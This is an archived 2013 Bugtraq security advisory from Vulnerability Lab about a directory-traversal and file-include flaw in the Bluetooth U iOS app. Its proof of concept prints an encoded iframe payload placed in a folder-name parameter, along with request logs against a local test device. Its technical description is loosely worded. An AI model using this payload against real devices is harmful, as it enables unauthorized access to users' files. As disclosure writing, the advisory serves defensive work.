lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 17 Oct 2013 14:13:11 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com
Subject: Bluetooth U v1.2.0 iOS - Directory Traversal Vulnerability

Document Title:
===============
Bluetooth U v1.2.0 iOS - Directory Traversal Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1111


Release Date:
=============
2013-10-16


Vulnerability Laboratory ID (VL-ID):
====================================
1111


Common Vulnerability Scoring System:
====================================
6.5


Product & Service Introduction:
===============================
Bluetooth U ensure both devices(iPhone&iPod&iPad) transfer files mutually, No file type restrictions.

(Copy of the Homepage: https://itunes.apple.com/de/app/bluetooth-u-share-files-photo/id526268815 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Bluetooth U v1.2.0 mobile iOS web-application.


Vulnerability Disclosure Timeline:
==================================
2013-10-16:    Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Apple AppStore
Product: Bluetooth U - Mobile Web Application 1.2.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A local path traversal and file include vulnerability is detected in the Bluetooth U v1.2.0  iOS mobile application (Apple iOS - iPad & iPhone).
The path traversal allows remote attackers to unauthorized switch or access folder to access application, device or system information.

The web vulnerability allows to bypass the regular path to folder generate by exploitation of the `New Folder` add function. Remote attackers 
can create a directory by using a manipulated second path with a frame to load. The vulnerability can be exploited by requesting the mobile 
application with a manipulated path (folder) value parameter. The redirect will load the wrong path value and redirects the user to the local 
mobile application or device system path/file. The malicious context also executes in the DelegateData on deletes too.

Exploitation of the path/directory web vulnerability requires no user interaction and non privileged mobile web.application user account.
Successful exploitation of the vulnerability results in the unauthorized access of remote users to local application path or system/device files.


Vulnerable Module(s):
				[+] New Folder - Index

Vulnerable Parameter(s):
				[+] chxItem & ChkItem


Proof of Concept (PoC):
=======================
The path/directory-traversl web vulnerability can be exploited by remote attackers without privileged application user account and also 
without user interaction. For demonstration or reproduce ...

PoC: Foldername - Index File Dir Listing (Wifi)

<table id="tableContent" border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th style="padding-left:10px;"><input id="selecteAll" onclick="selectAll(this)" 
type="checkbox"></th><th>Name</th><th>Size</th><th>Modified Date</th><th class="del">Delete</th></tr>
</thead>
<tbody id="filelist"><tr><td>
<input name="chxItem" value="%3Ciframe%20src%3D%3Fguid%3D%26type%3Dlist%26password%3D%26date%3DSun%20Oct%2013%202013%2017%3A46%3A15%20GMT%2B0200%3E" 
onclick="selChkItem(this)" type="checkbox"></td>
<td><a href="/%3Ciframe%20src%3D%3Fguid%3D%26type%3Dlist%26password%3D%26date%3DSun%20Oct%2013%202013%2017%3A46%3A15%20GMT%2B0200%3E
?guid=1520475B-0653-41FA-8072-CC31D2C5A8F2&type=child" class="file"><span style="vertical-align:middle;"><img src="/Folder.png" 
style="border:0;vertical-align:middle" ;=""></span><iframe src="?guid=&type=list&password=&date=Sun" oct="" 13="" 2013="" 
17:46:15="" gmt+0200=""></a></td><td></td><td>2013-10-13 17:53:31</td><td><input name="commit" type="button" value="Delete" 
onclick="DelegateData('/%3Ciframe%20src%3D%3Fguid%3D%26type%3Dlist%26password%3D%26date%3DSun%20Oct%2013%202013%2017%3A46%3A15%20GMT%2B0200%3E'
,'1520475B-0653-41FA-8072-CC31D2C5A8F2');" class='button' /></form></td></tr></tbody></table></iframe></a></td></tr><tr class="shadow">
<td><input name="chxItem" value="TEST23" onclick="selChkItem(this)" type="checkbox"></td>



--- PoC Session Logs (GET) ---
GET http://192.168.2.104:41498/%3C/BKM 
Load Flags[LOAD_DOCUMENT_URI  ] 
Content Size[0] 
Mime Type[application/x-unknown-content-type]

Request Headers:
Host[192.168.2.104:41498]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:41498/?guid=A0346D33-D3E0-40DF-BCD1-BC3A79B7F481&type=child&
type=child&date=Sun%20Oct%2013%202013%2016:17:12%20GMT+0200&type=child&date=Sun%20Oct%2013%202013%2016:20:47%20GMT+0200]
Connection[keep-alive]

Response Headers:
Accept-Ranges[bytes]
Content-Length[0]
Date[Sun, 13 Oct 2013 14:24:08 GMT]


--- Referer Context ---
{'isSecret':0,'isSame':1,'isDelete':0,'guid':'00B36887-6D9E-4FE6-BB4F-A8E200BACC96',
'detail':'Please input password','root':0,'title':'Bluetooth U','items':[{'name':'TEST23',
'isdir':1,'id':0,'filesize':102,'modDate':'2013-10-13 16:19:09'},{'name':'TEST24','isdir':1,
'id':1,'filesize':68,'modDate':'2013-10-13 16:19:14'},{'name':'TEST25','isdir':1,'id':2,
'filesize':68,'modDate':'2013-10-13 16:19:18'},{'name':'s2.png','isdir':0,'id':3,
'filesize':53025,'modDate':'2013-10-13 16:30:57'}],'dir':'/'}

Note: root :)


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction of the filename user input. Encode and parse the input and filter the 
index file name dir listing to prevent executions.


Security Risk:
==============
The security risk of the path/directory traversal web vulnerability is estimated as high(+).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@...lution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@...nerability-lab.com 	- research@...nerability-lab.com 	       - admin@...lution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@...nerability-lab.com or research@...nerability-lab.com) to get a permission.

				Copyright © 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com


Powered by blists - more mailing lists